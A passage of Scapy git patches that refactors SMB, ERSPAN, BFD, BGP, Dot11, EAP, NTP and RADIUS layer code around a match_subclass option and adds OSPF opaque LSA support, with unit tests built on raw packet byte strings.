+smb = pkt[SMBNegociate_Protocol_Request_Header] +assert smb.Start == b'\xffSMB' From 98136e8d56292178c0b2a88a9530fd17f1c36e38 Mon Sep 17 00:00:00 2001 From: _Frky <3105926+Frky@users.noreply.github.com> Date: Wed, 1 Apr 2020 16:47:50 +0200 Subject: [PATCH 0061/1632] Add comments + PEP8 compliant fixes --- scapy/layers/smb.py | 9 +++++++++ test/smb.uts | 4 ++-- 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index c8c284326a3..9ee82f31a27 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -140,12 +140,21 @@ class SMBNegociate_Protocol_Request_Header(Packet): ByteField("WordCount", 0), LEShortField("ByteCount", 12)] +# Generic version of SMBNegociate Protocol Request Header + + class SMBNegociate_Protocol_Request_Header_Generic(Packet): name = "SMBNegociate Protocol Request Header Generic" fields_desc = [StrFixedLenField("Start", b"\xffSMB", 4)] @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): + """ + Depending on the first 4 bytes of the packet, + dispatch to the correct version of Header + (either SMB or SMB2) + + """ if _pkt and len(_pkt) >= 4: if _pkt[:4] == b'\xffSMB': return SMBNegociate_Protocol_Request_Header diff --git a/test/smb.uts b/test/smb.uts index eea37871f43..79c16023913 100644 --- a/test/smb.uts +++ b/test/smb.uts @@ -16,7 +16,7 @@ smb = pkt[SMBNegociate_Protocol_Request_Header] # Check header values print(smb.show()) assert smb.Start == b'\xffSMB' -assert smb.Command == 0x72 # SMB_COM_NEGOCIATE +assert smb.Command == 0x72 # SMB_COM_NEGOCIATE # KO test rawpkt = b'\x45\x00\x00\x5b\x69\x10\x40\x00\x73\x06\xca\x85\x7a\xa0\x9a\xb6\xc0\xa8\xfe\x07\xeb\xec\x01\xbd\xaf\x97\x2e\xb7\x78\x60\x84\x6c\x50\x18\x40\x29\xd5\x36\x00\x00\x00\x00\x00\x2f\xf0\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x01\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x20\x18\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00' @@ -33,6 +33,6 @@ assert SMBNegociate_Protocol_Request_Header not in pkt = test SMB Negociate Header - assemble pkt = IP() / TCP() / NBTSession() / SMBNegociate_Protocol_Request_Header() -assert pkt[NBTSession].TYPE == 0x00 # session message +assert pkt[NBTSession].TYPE == 0x00 # session message smb = pkt[SMBNegociate_Protocol_Request_Header] assert smb.Start == b'\xffSMB' From 2c7f480763a9e029f15d9c4b95d4c0f1b86020f8 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 29 Mar 2020 15:34:00 +0000 Subject: [PATCH 0062/1632] Add contrib modules from scapy-vxlan --- scapy/contrib/bfd.py | 42 +++++++++++++++++++ scapy/contrib/erspan.py | 91 +++++++++++++++++++++++++++++++++++++++++ scapy/layers/l2.py | 15 ------- test/contrib/bfd.uts | 10 +++++ test/contrib/erspan.uts | 44 ++++++++++++++++++++ 5 files changed, 187 insertions(+), 15 deletions(-) create mode 100644 scapy/contrib/bfd.py create mode 100644 scapy/contrib/erspan.py create mode 100644 test/contrib/bfd.uts create mode 100644 test/contrib/erspan.uts diff --git a/scapy/contrib/bfd.py b/scapy/contrib/bfd.py new file mode 100644 index 00000000000..3cadaf6db70 --- /dev/null +++ b/scapy/contrib/bfd.py @@ -0,0 +1,42 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Parag Bhide +# This program is published under GPLv2 license + +""" +BFD - Bidirectional Forwarding Detection - RFC 5880, 5881 +""" + +# scapy.contrib.description = BFD +# scapy.contrib.status = loads + +from scapy.packet import Packet, bind_layers, bind_bottom_up +from scapy.fields import BitField, FlagsField, XByteField +from scapy.layers.inet import UDP + + +class BFD(Packet): + name = "BFD" + fields_desc = [ + BitField("version", 1, 3), + BitField("diag", 0, 5), + BitField("sta", 3, 2), + FlagsField("flags", 0x00, 6, ['P', 'F', 'C', 'A', 'D', 'M']), + XByteField("detect_mult", 0x03), + XByteField("len", 24), + BitField("my_discriminator", 0x11111111, 32), + BitField("your_discriminator", 0x22222222, 32), + BitField("min_tx_interval", 1000000000, 32), + BitField("min_rx_interval", 1000000000, 32), + BitField("echo_rx_interval", 1000000000, 32)] + + def mysummary(self): + return self.sprintf( + "BFD (my_disc=%BFD.my_discriminator%," + "your_disc=%BFD.my_discriminator%)" + ) + + +bind_bottom_up(UDP, BFD, dport=3784) +bind_bottom_up(UDP, BFD, sport=3784) +bind_layers(UDP, BFD, sport=3784, dport=3784) diff --git a/scapy/contrib/erspan.py b/scapy/contrib/erspan.py new file mode 100644 index 00000000000..3f7fb6a2aeb --- /dev/null +++ b/scapy/contrib/erspan.py @@ -0,0 +1,91 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# This program is published under GPLv2 license + +""" +ERSPAN - Encapsulated Remote SPAN +""" + +# scapy.contrib.description = ERSPAN - Encapsulated Remote SPAN +# scapy.contrib.status = loads + +# This file inspired by scapy-vxlan + +from scapy.packet import Packet, bind_layers +from scapy.fields import BitField, BitEnumField, XIntField, \ + XShortField +from scapy.layers.l2 import Ether, GRE + + +class ERSPAN(Packet): + """ + A generic ERSPAN packet, pointing by default to ERSPAN II + """ + name = "ERSPAN" + fields_desc = [] + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if cls == ERSPAN: + return ERSPAN_II + return Packet.dispatch_hook(cls, _pkt, *args, **kargs) + + +class ERSPAN_I(ERSPAN): + name = "ERSPAN I" + match_subclass = True + fields_desc = [] + + +class ERSPAN_II(ERSPAN): + name = "ERSPAN II" + match_subclass = True + fields_desc = [BitField("ver", 0, 4), + BitField("vlan", 0, 12), + BitField("cos", 0, 3), + BitField("en", 0, 2), + BitField("t", 0, 1), + BitField("session_id", 0, 10), + BitField("reserved", 0, 12), + BitField("index", 0, 20), + ] + + +class ERSPAN_III(ERSPAN): + name = "ERSPAN III" + match_subclass = True + fields_desc = [BitField("ver", 2, 4), + BitField("vlan", 0, 12), + BitField("cos", 0, 3), + BitField("bso", 0, 2), + BitField("t", 0, 1), + BitField("session_id", 0, 10), + XIntField("timestamp", 0x00000000), + XShortField("sgt_other", 0x00000000), + BitField("p", 0, 1), + BitEnumField("ft", 0, 5, + {0: "Ethernet", 2: "IP"}), + BitField("hw", 0, 6), + BitField("d", 0, 1), + BitEnumField("gra", 0, 2, + {0: "100us", 1: "100ns", 2: "IEEE 1588"}), + BitField("o", 0, 1) + ] + + +class ERSPAN_PlatformSpecific(Packet): + name = "PlatformSpecific" + fields_desc = [BitField("platf_id", 0, 6), + BitField("info1", 0, 26), + XIntField("info2", 0x00000000)] + + +bind_layers(ERSPAN_I, Ether) +bind_layers(ERSPAN_II, Ether) +bind_layers(ERSPAN_III, Ether, o=0) +bind_layers(ERSPAN_III, ERSPAN_PlatformSpecific, o=1) +bind_layers(ERSPAN_PlatformSpecific, Ether) + +bind_layers(GRE, ERSPAN, proto=0x88be, seqnum_present=0) +bind_layers(GRE, ERSPAN_II, proto=0x88be, seqnum_present=1) +bind_layers(GRE, ERSPAN_III, proto=0x22eb) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 962648e838f..29e1f5d736f 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -438,19 +438,6 @@ def l2_register_l3_arp(l2, l3): conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp) -class ERSPAN(Packet): - name = "ERSPAN" - fields_desc = [BitField("ver", 0, 4), - BitField("vlan", 0, 12), - BitField("cos", 0, 3), - BitField("en", 0, 2), - BitField("t", 0, 1), - BitField("session_id", 0, 10), - BitField("reserved", 0, 12), - BitField("index", 0, 20), - ] - - class GRErouting(Packet): name = "GRE routing information" fields_desc = [ShortField("address_family", 0), @@ -571,7 +558,6 @@ class Dot1AD(Dot1Q): bind_layers(Dot1AD, Dot1AD, type=0x88a8) bind_layers(Dot1AD, Dot1Q, type=0x8100) bind_layers(Dot1Q, Dot1AD, type=0x88a8) -bind_layers(ERSPAN, Ether) bind_layers(Ether, Ether, type=1) bind_layers(Ether, ARP, type=2054) bind_layers(CookedLinux, LLC, proto=122) @@ -585,7 +571,6 @@ class Dot1AD(Dot1Q): bind_layers(GRE, Dot1AD, type=0x88a8) bind_layers(GRE, Ether, proto=0x6558) bind_layers(GRE, ARP, proto=2054) -bind_layers(GRE, ERSPAN, proto=0x88be, seqnum_present=1) bind_layers(GRE, GRErouting, {"routing_present": 1}) bind_layers(GRErouting, conf.raw_layer, {"address_family": 0, "SRE_len": 0}) bind_layers(GRErouting, GRErouting) diff --git a/test/contrib/bfd.uts b/test/contrib/bfd.uts new file mode 100644 index 00000000000..f6175cbd60c --- /dev/null +++ b/test/contrib/bfd.uts @@ -0,0 +1,10 @@ ++ BFD + += BFD, basic instantiation + +a = UDP()/BFD() +assert raw(a) == b'\x0e\xc8\x0e\xc8\x00 \x00\x00 \xc0\x03\x18\x11\x11\x11\x11"""";\x9a\xca\x00;\x9a\xca\x00;\x9a\xca\x00' + += BFD - dissection + +assert BFD in UDP(raw(a)) diff --git a/test/contrib/erspan.uts b/test/contrib/erspan.uts new file mode 100644 index 00000000000..cdff9e2b64b --- /dev/null +++ b/test/contrib/erspan.uts @@ -0,0 +1,44 @@ +% ERSPAN + ++ ERSPAN I += Build & dissect ERSPAN 1 + +pkt = GRE()/ERSPAN_I()/Ether() +pkt = GRE(bytes(pkt)) +assert ERSPAN in pkt +assert pkt.proto == 0x88be +assert pkt.seqnum_present == 0 + ++ ERSPAN II += Build ERSPAN II + +pkt = GRE()/ERSPAN_II()/Ether(src="11:11:11:11:11:11", dst="ff:ff:ff:ff:ff:ff") +b = bytes(pkt) +assert b == b'\x10\x00\x88\xbe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\x11\x11\x11\x11\x11\x11\x90\x00' + += Dissect ERSPAN II + +pkt = GRE(b) +assert pkt[GRE].proto == 0x88be +assert pkt[GRE].seqnum_present == 1 +assert pkt[GRE][ERSPAN].ver == 0 +assert pkt[Ether].src == "11:11:11:11:11:11" + ++ ERSPAN III += Build & dissect ERSPAN III with platform specific + +pkt = GRE()/ERSPAN_III()/ERSPAN_PlatformSpecific()/Ether() +pkt = GRE(bytes(pkt)) +assert pkt[GRE].proto == 0x22eb +assert pkt[ERSPAN_III].o == 1 +assert ERSPAN_PlatformSpecific in pkt +assert Ether in pkt + += Build & dissect ERSPAN III without platform specific +pkt = GRE()/ERSPAN_III()/Ether() +pkt = GRE(bytes(pkt)) +assert pkt[GRE].proto == 0x22eb +assert pkt[ERSPAN_III].o == 0 +assert ERSPAN_PlatformSpecific not in pkt +assert Ether in pkt + From c6c204aa3cfa1d95b02e68b4d73de0faae8fc73b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 29 Mar 2020 16:23:47 +0000 Subject: [PATCH 0063/1632] Fix docstring --- scapy/packet.py | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index ab6c44cf384..b204d906327 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1696,10 +1696,10 @@ def build_padding(self): def bind_bottom_up(lower, upper, __fval=None, **fval): - """Bind 2 layers for dissection. + r"""Bind 2 layers for dissection. The upper layer will be chosen for dissection on top of the lower layer, if - ALL the passed arguments are validated. If multiple calls are made with the same # noqa: E501 - layers, the last one will be used as default. + ALL the passed arguments are validated. If multiple calls are made with + the same layers, the last one will be used as default. ex: >>> bind_bottom_up(Ether, SNAP, type=0x1234) @@ -1714,8 +1714,8 @@ def bind_bottom_up(lower, upper, __fval=None, **fval): def bind_top_down(lower, upper, __fval=None, **fval): """Bind 2 layers for building. - When the upper layer is added as a payload of the lower layer, all the arguments # noqa: E501 - will be applied to them. + When the upper layer is added as a payload of the lower layer, all the + arguments will be applied to them. ex: >>> bind_top_down(Ether, SNAP, type=0x1234) From b1320eace732a29cc092d0cd4bec2c8453cc8df8 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 1 Apr 2020 16:03:46 +0000 Subject: [PATCH 0064/1632] Support match_subclass in haslayer --- scapy/packet.py | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index b204d906327..7df0cd7804a 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1083,10 +1083,19 @@ def layers(self): lyr = lyr.payload.getlayer(0, _subclass=True) return layers - def haslayer(self, cls): - """true if self has a layer that is an instance of cls. Superseded by "cls in self" syntax.""" # noqa: E501 - if self.__class__ == cls or cls in [self.__class__.__name__, - self._name]: + def haslayer(self, cls, _subclass=None): + """ + true if self has a layer that is an instance of cls. + Superseded by "cls in self" syntax. + """ + if _subclass is None: + _subclass = self.match_subclass or None + if _subclass: + match = lambda cls1, cls2: issubclass(cls1, cls2) + else: + match = lambda cls1, cls2: cls1 == cls2 + if cls is None or match(self.__class__, cls) \ + or cls in [self.__class__.__name__, self._name]: return True for f in self.packetfields: fvalue_gen = self.getfieldval(f.name) @@ -1096,10 +1105,10 @@ def haslayer(self, cls): fvalue_gen = SetGen(fvalue_gen, _iterpacket=0) for fvalue in fvalue_gen: if isinstance(fvalue, Packet): - ret = fvalue.haslayer(cls) + ret = fvalue.haslayer(cls, _subclass=_subclass) if ret: return ret - return self.payload.haslayer(cls) + return self.payload.haslayer(cls, _subclass=_subclass) def getlayer(self, cls, nb=1, _track=None, _subclass=None, **flt): """Return the nb^th layer that is an instance of cls, matching flt @@ -1607,7 +1616,7 @@ def hashret(self): def answers(self, other): return isinstance(other, NoPayload) or isinstance(other, conf.padding_layer) # noqa: E501 - def haslayer(self, cls): + def haslayer(self, cls, _subclass=None): return 0 def getlayer(self, cls, nb=1, _track=None, **flt): From 4dd84a1f184eb5e124111d668160a6e097847581 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 1 Apr 2020 16:53:10 +0000 Subject: [PATCH 0065/1632] Migrate old layers to match_subclass --- scapy/contrib/bgp.py | 21 +++++---------------- scapy/layers/dot11.py | 19 +++++-------------- scapy/layers/eap.py | 20 ++++++-------------- scapy/layers/ntp.py | 21 ++++----------------- scapy/layers/radius.py | 17 +++-------------- scapy/packet.py | 4 ++-- scapy/utils.py | 6 +++++- 7 files changed, 30 insertions(+), 78 deletions(-) diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index b2bb75a3ff2..54fbba5b6bf 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -35,7 +35,6 @@ MultiEnumField) from scapy.layers.inet import TCP from scapy.layers.inet6 import IP6Field -from scapy.utils import issubtype from scapy.config import conf, ConfClass from scapy.compat import orb, chb from scapy.error import log_runtime @@ -604,21 +603,6 @@ def pre_dissect(self, s): raise _BGPInvalidDataException(err) return s - # Every BGP capability object inherits from BGPCapability. - def haslayer(self, cls): - if cls == "BGPCapability": - if isinstance(self, BGPCapability): - return True - elif issubtype(cls, BGPCapability): - if isinstance(self, cls): - return True - return super(BGPCapability, self).haslayer(cls) - - def getlayer(self, cls, nb=1, _track=None, _subclass=True, **flt): - return super(BGPCapability, self).getlayer( - cls, nb=nb, _track=_track, _subclass=True, **flt - ) - def post_build(self, p, pay): length = 0 if self.length is None: @@ -635,6 +619,7 @@ class BGPCapGeneric(BGPCapability): """ name = "BGP Capability" + match_subclass = True fields_desc = [ ByteEnumField("code", 0, _capabilities), FieldLenField("length", None, fmt="B", length_of="cap_data"), @@ -655,6 +640,7 @@ class BGPCapMultiprotocol(BGPCapability): """ name = "Multiprotocol Extensions for BGP-4" + match_subclass = True fields_desc = [ ByteEnumField("code", 1, _capabilities), ByteField("length", 4), @@ -763,6 +749,7 @@ class BGPCapORF(BGPCapability): """ name = "Outbound Route Filtering Capability" + match_subclass = True fields_desc = [ ByteEnumField("code", 3, _capabilities), ByteField("length", None), @@ -800,6 +787,7 @@ class GRTuple(Packet): ByteEnumField("flags", 0, gr_address_family_flags)] name = "Graceful Restart Capability" + match_subclass = True fields_desc = [ByteEnumField("code", 64, _capabilities), ByteField("length", None), BitField("restart_flags", 0, 4), @@ -819,6 +807,7 @@ class BGPCapFourBytesASN(BGPCapability): """ name = "Support for 4-octet AS number capability" + match_subclass = True fields_desc = [ByteEnumField("code", 65, _capabilities), ByteField("length", 4), IntField("asn", 0)] diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 965cfd0da1a..896005eaad8 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -43,7 +43,6 @@ from scapy.layers.inet import IP, TCP from scapy.error import warning, log_loading from scapy.sendrecv import sniff, sendp -from scapy.utils import issubtype if conf.crypto_valid: @@ -755,19 +754,6 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return cls.registered_ies.get(_id, cls) return cls - def haslayer(self, cls): - if cls == "Dot11Elt": - if isinstance(self, Dot11Elt): - return True - elif issubtype(cls, Dot11Elt): - if isinstance(self, cls): - return True - return super(Dot11Elt, self).haslayer(cls) - - def getlayer(self, cls, nb=1, _track=None, _subclass=True, **flt): - return super(Dot11Elt, self).getlayer(cls, nb=nb, _track=_track, - _subclass=True, **flt) - def pre_dissect(self, s): # Backward compatibility: add info to all elements # This allows to introduce new Dot11Elt classes without breaking @@ -835,6 +821,7 @@ def extract_padding(self, s): class Dot11EltRSN(Dot11Elt): name = "802.11 RSN information" + match_subclass = True fields_desc = [ ByteField("ID", 48), ByteField("len", None), @@ -893,6 +880,7 @@ def extract_padding(self, s): class Dot11EltCountry(Dot11Elt): name = "802.11 Country" + match_subclass = True fields_desc = [ ByteField("ID", 7), ByteField("len", None), @@ -914,6 +902,7 @@ class Dot11EltCountry(Dot11Elt): class Dot11EltMicrosoftWPA(Dot11Elt): name = "802.11 Microsoft WPA" + match_subclass = True fields_desc = [ ByteField("ID", 221), ByteField("len", None), @@ -948,6 +937,7 @@ class Dot11EltMicrosoftWPA(Dot11Elt): class Dot11EltRates(Dot11Elt): name = "802.11 Rates" + match_subclass = True fields_desc = [ ByteField("ID", 1), ByteField("len", None), @@ -962,6 +952,7 @@ class Dot11EltRates(Dot11Elt): class Dot11EltVendorSpecific(Dot11Elt): name = "802.11 Vendor Specific" + match_subclass = True fields_desc = [ ByteField("ID", 221), ByteField("len", None), diff --git a/scapy/layers/eap.py b/scapy/layers/eap.py index 82f6c5c1870..d0f28cf6505 100644 --- a/scapy/layers/eap.py +++ b/scapy/layers/eap.py @@ -18,7 +18,6 @@ PacketField, PacketListField, ConditionalField, PadField from scapy.packet import Packet, Padding, bind_layers from scapy.layers.l2 import SourceMACField, Ether, CookedLinux, GRE, SNAP -from scapy.utils import issubtype from scapy.config import conf from scapy.compat import orb, chb @@ -243,19 +242,6 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return cls.registered_methods.get(t, cls) return cls - def haslayer(self, cls): - if cls == "EAP": - if isinstance(self, EAP): - return True - elif issubtype(cls, EAP): - if isinstance(self, cls): - return True - return super(EAP, self).haslayer(cls) - - def getlayer(self, cls, nb=1, _track=None, _subclass=True, **flt): - return super(EAP, self).getlayer(cls, nb=nb, _track=_track, - _subclass=True, **flt) - def answers(self, other): if isinstance(other, EAP): if self.code == self.REQUEST: @@ -295,6 +281,7 @@ class EAP_MD5(EAP): """ name = "EAP-MD5" + match_subclass = True fields_desc = [ ByteEnumField("code", 1, eap_codes), ByteField("id", 0), @@ -313,6 +300,7 @@ class EAP_TLS(EAP): """ name = "EAP-TLS" + match_subclass = True fields_desc = [ ByteEnumField("code", 1, eap_codes), ByteField("id", 0), @@ -335,6 +323,7 @@ class EAP_TTLS(EAP): """ name = "EAP-TTLS" + match_subclass = True fields_desc = [ ByteEnumField("code", 1, eap_codes), ByteField("id", 0), @@ -357,6 +346,7 @@ class EAP_PEAP(EAP): """ name = "PEAP" + match_subclass = True fields_desc = [ ByteEnumField("code", 1, eap_codes), ByteField("id", 0), @@ -380,6 +370,7 @@ class EAP_FAST(EAP): """ name = "EAP-FAST" + match_subclass = True fields_desc = [ ByteEnumField("code", 1, eap_codes), ByteField("id", 0), @@ -403,6 +394,7 @@ class LEAP(EAP): """ name = "Cisco LEAP" + match_subclass = True fields_desc = [ ByteEnumField("code", 1, eap_codes), ByteField("id", 0), diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index a294b606b3b..eb84c4d6d16 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -22,7 +22,7 @@ PadField from scapy.layers.inet6 import IP6Field from scapy.layers.inet import UDP -from scapy.utils import issubtype, lhex +from scapy.utils import lhex from scapy.compat import orb from scapy.config import conf import scapy.modules.six as six @@ -207,22 +207,6 @@ def pre_dissect(self, s): raise _NTPInvalidDataException(err) return s - # NTPHeader, NTPControl and NTPPrivate are NTP packets. - # This might help, for example when reading a pcap file. - def haslayer(self, cls): - """Specific: NTPHeader().haslayer(NTP) should return True.""" - if cls == "NTP": - if isinstance(self, NTP): - return True - elif issubtype(cls, NTP): - if isinstance(self, cls): - return True - return super(NTP, self).haslayer(cls) - - def getlayer(self, cls, nb=1, _track=None, _subclass=True, **flt): - return super(NTP, self).getlayer(cls, nb=nb, _track=_track, - _subclass=True, **flt) - def mysummary(self): return self.sprintf("NTP v%ir,NTP.version%, %NTP.mode%") @@ -436,6 +420,7 @@ class NTPHeader(NTP): # name = "NTPHeader" + match_subclass = True fields_desc = [ BitEnumField("leap", 0, 2, _leap_indicator), BitField("version", 4, 3), @@ -805,6 +790,7 @@ class NTPControl(NTP): # name = "Control message" + match_subclass = True fields_desc = [ BitField("zeros", 0, 2), BitField("version", 2, 3), @@ -1785,6 +1771,7 @@ class NTPPrivate(NTP): # name = "Private (mode 7)" + match_subclass = True fields_desc = [ BitField("response", 0, 1), BitField("more", 0, 1), diff --git a/scapy/layers/radius.py b/scapy/layers/radius.py index c1e8a1844df..bc1cd9a72f1 100644 --- a/scapy/layers/radius.py +++ b/scapy/layers/radius.py @@ -18,7 +18,6 @@ PacketListField, IPField, MultiEnumField from scapy.layers.inet import UDP from scapy.layers.eap import EAP -from scapy.utils import issubtype from scapy.config import conf from scapy.error import Scapy_Exception @@ -257,19 +256,6 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return cls.registered_attributes.get(attr_type, cls) return cls - def haslayer(self, cls): - if cls == "RadiusAttribute": - if isinstance(self, RadiusAttribute): - return True - elif issubtype(cls, RadiusAttribute): - if isinstance(self, cls): - return True - return super(RadiusAttribute, self).haslayer(cls) - - def getlayer(self, cls, nb=1, _track=None, _subclass=True, **flt): - return super(RadiusAttribute, self).getlayer(cls, nb=nb, _track=_track, - _subclass=True, **flt) - def post_build(self, p, pay): length = self.len if length is None: @@ -288,6 +274,7 @@ class _SpecificRadiusAttr(RadiusAttribute): """ __slots__ = ["val"] + match_subclass = True def __init__(self, _pkt="", post_transform=None, _internal=0, _underlayer=None, **fields): # noqa: E501 super(_SpecificRadiusAttr, self).__init__( @@ -1031,6 +1018,7 @@ class RadiusAttr_EAP_Message(RadiusAttribute): """ name = "EAP-Message" + match_subclass = True fields_desc = [ ByteEnumField("type", 79, _radius_attribute_types), FieldLenField( @@ -1050,6 +1038,7 @@ class RadiusAttr_Vendor_Specific(RadiusAttribute): """ name = "Vendor-Specific" + match_subclass = True fields_desc = [ ByteEnumField("type", 26, _radius_attribute_types), FieldLenField( diff --git a/scapy/packet.py b/scapy/packet.py index 7df0cd7804a..fac63cd0345 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1091,7 +1091,7 @@ def haslayer(self, cls, _subclass=None): if _subclass is None: _subclass = self.match_subclass or None if _subclass: - match = lambda cls1, cls2: issubclass(cls1, cls2) + match = issubtype else: match = lambda cls1, cls2: cls1 == cls2 if cls is None or match(self.__class__, cls) \ @@ -1117,7 +1117,7 @@ def getlayer(self, cls, nb=1, _track=None, _subclass=None, **flt): if _subclass is None: _subclass = self.match_subclass or None if _subclass: - match = lambda cls1, cls2: issubclass(cls1, cls2) + match = issubtype else: match = lambda cls1, cls2: cls1 == cls2 if isinstance(cls, int): diff --git a/scapy/utils.py b/scapy/utils.py index caf8b2dbe30..606c46e3d69 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -48,7 +48,11 @@ def issubtype(x, t): When using a tuple as the second argument issubtype(X, (A, B, ...)), is a shortcut for issubtype(X, A) or issubtype(X, B) or ... (etc.). """ - return isinstance(x, type) and issubclass(x, t) + if isinstance(t, str): + return t in (z.__name__ for z in x.__bases__) + if isinstance(x, type) and issubclass(x, t): + return True + return False class EDecimal(Decimal): From 551c1b76e007ea5f5fc88ef00f61600d072b4f2c Mon Sep 17 00:00:00 2001 From: smvoigt Date: Sat, 4 Apr 2020 01:55:10 +1030 Subject: [PATCH 0066/1632] Added OSPF Opaque LSAs (#2524) * Added OSPF Opaque LSAs * Apply reviewer changes as requested Co-authored-by: Shaun --- scapy/contrib/ospf.py | 44 ++++++++++++++++++++++++++++++++++++++++--- test/contrib/ospf.uts | 33 ++++++++++++++++++++++++++++++++ 2 files changed, 74 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/ospf.py b/scapy/contrib/ospf.py index 97e924df5d5..12fe3b3af06 100644 --- a/scapy/contrib/ospf.py +++ b/scapy/contrib/ospf.py @@ -36,7 +36,7 @@ ShortField, StrLenField, X3BytesField, XIntField, XLongField, XShortField from scapy.layers.inet import IP, DestIPField from scapy.layers.inet6 import IPv6, in6_chksum -from scapy.utils import fletcher16_checkbytes, checksum +from scapy.utils import fletcher16_checkbytes, checksum, inet_aton from scapy.compat import orb from scapy.config import conf @@ -202,14 +202,20 @@ def post_build(self, p, pay): 3: "summaryIP", 4: "summaryASBR", 5: "external", - 7: "NSSAexternal"} + 7: "NSSAexternal", + 9: "linkScopeOpaque", + 10: "areaScopeOpaque", + 11: "asScopeOpaque"} _OSPF_LSclasses = {1: "OSPF_Router_LSA", 2: "OSPF_Network_LSA", 3: "OSPF_SummaryIP_LSA", 4: "OSPF_SummaryASBR_LSA", 5: "OSPF_External_LSA", - 7: "OSPF_NSSA_External_LSA"} + 7: "OSPF_NSSA_External_LSA", + 9: "OSPF_Link_Scope_Opaque_LSA", + 10: "OSPF_Area_Scope_Opaque_LSA", + 11: "OSPF_AS_Scope_Opaque_LSA"} def ospf_lsa_checksum(lsa): @@ -367,6 +373,38 @@ class OSPF_NSSA_External_LSA(OSPF_External_LSA): type = 7 +class OSPF_Link_Scope_Opaque_LSA(OSPF_BaseLSA): + name = "OSPF Link Scope External LSA" + type = 9 + fields_desc = [ShortField("age", 1), + OSPFOptionsField(), + ByteField("type", 9), + IPField("id", "192.0.2.1"), + IPField("adrouter", "198.51.100.100"), + XIntField("seq", 0x80000001), + XShortField("chksum", None), + ShortField("len", None), + StrLenField("data", "data", + length_from=lambda pkt: pkt.len - 20) + ] + + def opaqueid(self): + return struct.unpack('>I', inet_aton(self.id))[0] & 0xFFFFFF + + def opaquetype(self): + return (struct.unpack('>I', inet_aton(self.id))[0] >> 24) & 0xFF + + +class OSPF_Area_Scope_Opaque_LSA(OSPF_Link_Scope_Opaque_LSA): + name = "OSPF Area Scope External LSA" + type = 10 + + +class OSPF_AS_Scope_Opaque_LSA(OSPF_Link_Scope_Opaque_LSA): + name = "OSPF AS Scope External LSA" + type = 11 + + class OSPF_DBDesc(Packet): name = "OSPF Database Description" fields_desc = [ShortField("mtu", 1500), diff --git a/test/contrib/ospf.uts b/test/contrib/ospf.uts index 0c5a4763b4f..081d180e64c 100644 --- a/test/contrib/ospf.uts +++ b/test/contrib/ospf.uts @@ -47,3 +47,36 @@ assert a.answers(b) pkt = Ether(dst="01:00:5e:00:00:05", src="ca:11:09:b3:00:1c")/IPv6(dst="::1", src="fe80::160c:12aa:fe7e:cd28")/OSPFv3_Hdr(src="75.1.3.1")/\ OSPFv3_Hello(options=0x12, router="10.75.0.254", backup="10.75.0.1", neighbors=["75.1.0.1"]) assert raw(pkt) == b'\x01\x00^\x00\x00\x05\xca\x11\t\xb3\x00\x1c\x86\xdd`\x00\x00\x00\x00(Y@\xfe\x80\x00\x00\x00\x00\x00\x00\x16\x0c\x12\xaa\xfe~\xcd(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x03\x01\x00(K\x01\x03\x01\x00\x00\x00\x00Y\x98\x00\x00\x00\x00\x00\x00\x01\x00\x00\x12\x00\n\x00(\nK\x00\xfe\nK\x00\x01K\x01\x00\x01' + += OSPFv2 Opaque lsa + +data = b'\x01\x00^\x00\x00\x05\x00\x90\x92\x9d\x94\x01\x08\x00E\xc0\x00\xb4?\x99\x00\x00\x01Y\xc6\x91\xd2\x00\x00\x01\xe0\x00\x00\x05\x02\x04\x00\xa0\x11\x03\x03\x03\x00\x00\x00d9\x9f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01 \n\x01\x00\x00\x00\x11\x03\x03\x03\x80\x00\x00\x1f\xab\xd9\x00\x84\x00\x01\x00\x04\x11\x03\x03\x03\x00\x02\x00d\x00\x01\x00\x01\x02\x00\x00\x00\x00\x02\x00\x04\xd2\x00\x00\x02\x00\x03\x00\x04\xd2\x00\x00\x01\x00\x04\x00\x04\xd2\x00\x00\x02\x00\x05\x00\x04\x00\x00\x03\xe8\x00\x06\x00\x04I\x98\x96\x80\x00\x07\x00\x04I\x98\x96\x80\x00\x08\x00 